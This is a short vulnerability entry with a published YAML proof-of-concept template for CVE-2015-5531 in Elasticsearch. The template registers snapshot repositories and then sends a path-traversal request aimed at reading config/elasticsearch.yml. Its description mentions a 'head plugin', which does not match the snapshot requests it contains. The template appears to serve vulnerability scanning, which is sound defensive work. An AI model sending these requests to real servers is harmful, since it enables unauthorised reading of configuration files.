漏洞描述
Elasticsearch before 1.4.4 allows remote attackers to read arbitrary files via a crafted request to the head plugin.
CVE-2015-5531: Elasticsearch CVE-2015-5531
PoC代码[已公开]
id: CVE-2015-5531
info:
name: Elasticsearch CVE-2015-5531
author: ha9worm
severity: medium
description: |-
Elasticsearch before 1.4.4 allows remote attackers to read arbitrary files via a crafted request to the head plugin.
reference:
- https://www.elastic.co/community/security
- https://nvd.nist.gov/vuln/detail/CVE-2015-5531
tags: cve,cve2015,elasticsearch,fileread
created: 2023/07/13
set:
r1: randomLowercase(4)
rules:
r0:
request:
method: PUT
path: /_snapshot/{{r1}}
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r1:
request:
method: PUT
path: /_snapshot/{{r1}}2
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r2:
request:
method: GET
path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
follow_redirects: true
expression: response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
expression: r0() && r1() && r2()